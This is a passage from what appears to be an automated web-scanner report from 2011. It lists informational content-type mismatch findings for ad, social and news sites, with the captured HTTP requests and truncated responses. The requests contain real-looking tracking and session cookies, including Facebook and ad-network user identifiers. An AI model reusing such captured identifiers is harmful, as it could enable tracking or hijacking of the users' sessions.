Content-Length: 33

__verify_callback_828489752952(2)
22.24. http://service.zdnet.com/wi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://service.zdnet.com
Path:   /wi

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wi?spot=related-js&format=text&count=5&null=true&ct=blogs.zdnet.com&id=ZDNB.BL.26.207595&referer=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773 HTTP/1.1
Host: service.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 526
Date: Thu, 12 May 2011 13:28:13 GMT

function asset(assetId, title, url, pubDate, commentCount) {
this.assetId = assetId;
this.title = unescape(title);
this.url = unescape(url);
this.pubDate = pubDate;
this.commentCou
...[SNIP]...
22.25. http://shop.mysuburbanlife.com/ROP/portablerop.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:51 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68519

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
22.26. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:11 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:32:58 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:32:58 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Set-Cookie: _curtime=1305207178; domain=pubmatic.com; expires=Thu, 12-May-2011 14:42:58 GMT; path=/
Set-Cookie: pubfreq_25277_19976_856941671=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:12:58 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Content-Length: 1486

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9932717481735209|cb=1305207191|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
22.27. http://static.fmpub.net/site/mashable  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.fmpub.net
Path:   /site/mashable

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /site/mashable HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Wed, 02 Mar 2011 02:07:21 GMT
Accept-Ranges: bytes
X-Server: static2.chi.fmpub.net
Keep-Alive: timeout=120, max=942
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Thu, 12 May 2011 13:28:29 GMT
Age: 3159
Content-Length: 3348


var fmJsHost = (("https:" == document.location.protocol) ? "https://" : "http://");


var fm_query_string = window.location.search.substr(1).split('&');
var fm_pairs = {};
for (var i = 0; i < fm_quer
...[SNIP]...
22.28. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=119251788156770&app_id=119251788156770&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3054b7228%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1530c7d68%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1390e1ef%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df35ab75aa%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df224684e0%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.131
X-Cnection: close
Date: Thu, 12 May 2011 13:30:49 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
22.29. http://www.facebook.com/profile/pic.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /profile/pic.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /profile/pic.php?oid=AAAAAwAgACAAAAAPGpkM39yYlC_-UQcTRgxu115hCphFd69BTobv3zY9xZY7WP-WDuLyWDbPxFawXyrcSw4ffa4vChZeGBdrwOK57vjarYsCwdr9S1EjPNuHQuczIh9EfBu6C5gj_JnGO43L&size=square HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=LF24m; path=/; domain=.facebook.com
X-FB-Server: 10.27.62.105
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 393

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g.    ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...
22.30. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.milehighonthecheap.com
Path:   /wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php?ver=130214d369d555e15e6b1621771809ad HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1990 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: anti-captcha-crc=2bb3a2de5725d2724dbe008da57327593dab4987; expires=Thu, 12-May-2011 14:32:38 GMT; path=/
Last-Modified: Thu, 12 May 2011 13:32:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3327

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...
22.31. http://www.mysuburbanlife.com/!/commenting/users/check_status  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mysuburbanlife.com
Path:   /!/commenting/users/check_status

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /!/commenting/users/check_status HTTP/1.1
Host: www.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; __unam=479396c-12fe4670aa4-36975e97-1; __utmz=1.1305207073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1234934801.1305207073.1305207073.1305207073.1; __utmc=1; __utmb=1.2.9.1305207073246; __utmz=90547846.1305207073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90547846.1582878352.1305207073.1305207073.1305207073.1; __utmc=90547846; __utmb=90547846.2.9.1305207073252; __qca=P0-1808403856-1305207073254

Response

HTTP/1.1 400 Bad Request
Date: Thu, 12 May 2011 13:31:14 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 17
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:00:00 GMT
Content-Type: application/json
X-Cache: MISS from parent1.ghm.zope.net
X-Cache: MISS from cache4.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache4.ghm.zope.net:80 (squid)
Connection: close

["No such user."]
22.32. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hostedbadge.php?s=5&r=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&a=1&d=su_v_613459 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 13:29:11 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 336


       document.getElementById('su_v_613459').innerHTML+="<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/5\/?url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F\" scroll
...[SNIP]...
22.33. http://www.zdnet.com/toolbar-service  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /toolbar-service

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

POST /toolbar-service HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
Origin: http://www.zdnet.com
X-Request: JSON
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1
Content-Length: 50

cid=207595&ct=Blog%20posts&serviceCid=desktop_5773

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:13 GMT
Server: Apache
ntCoent-Length: 90
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 90

[{"cid":"207595","voteCount":"0","commentCount":"2","shortUrl":"http:\/\/zd.net\/lYk7fy"}]
22.34. http://zapp0.staticworld.net/news/graphics/221051-cr-48_180.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zapp0.staticworld.net
Path:   /news/graphics/221051-cr-48_180.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /news/graphics/221051-cr-48_180.png HTTP/1.1
Host: zapp0.staticworld.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:51 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 17:34:02 GMT
ETag: "44fec1-a0c-49d6f33cd30c0"
Accept-Ranges: bytes
Content-Length: 2572
Content-Type: image/png
Cache-Control: max-age=7777777
X-Origin-Date: Thu, 05 May 2011 04:01:58 GMT
X-Cache-Age: 48147
X-Cache: HIT from cdce-nym011-016.nym011.internap.com
X-Origin-Date: Thu, 12 May 2011 04:51:14 GMT
X-Cache-Age: 31117
X-Cache: HIT from cdce-nym011-016.nym011.internap.com
Via: 1.1 cdce-nym011-016.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-016.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......]...."..............................
...[SNIP]...
22.35. http://zapp5.staticworld.net/ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zapp5.staticworld.net
Path:   /ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg HTTP/1.1
Host: zapp5.staticworld.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:30:11 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 19:07:26 GMT
ETag: "aa4312-1d1e1-4a263d9cc2df1"
Accept-Ranges: bytes
Content-Length: 119265
Content-Type: image/jpeg
Cache-Control: max-age=7777777
X-Origin-Date: Wed, 11 May 2011 09:49:25 GMT
X-Cache-Age: 98961
X-Cache: HIT from cdce-nym011-018.nym011.internap.com
X-Origin-Date: Thu, 12 May 2011 13:18:46 GMT
X-Cache-Age: 685
X-Cache: HIT from cdce-nym011-019.nym011.internap.com
Via: 1.1 cdce-nym011-018.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-019.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

.PNG
.
...IHDR...<..........V......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....]G}/>s...W.........e..40...1..K.'.6.GH....|.$..........p.....{.eI..JZm........s..d.`..z}..s...;.....r...A.z.>55...8
...[SNIP]...
22.36. http://zapp5.staticworld.net/howto/graphics/162760-drm-free._originaljpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zapp5.staticworld.net
Path:   /howto/graphics/162760-drm-free._originaljpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /howto/graphics/162760-drm-free._originaljpeg HTTP/1.1
Host: zapp5.staticworld.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:30:20 GMT
Last-Modified: Wed, 08 Apr 2009 20:36:36 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Server: Apache
ETag: "25c48c-1c15-46711167ec8b8"
Cache-Control: max-age=7777777
X-Origin-Date: Thu, 12 May 2011 13:30:20 GMT
X-Cache-Age: 0
X-Cache: HIT from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-015.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 7189

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................w....
...[SNIP]...
23. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

23.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
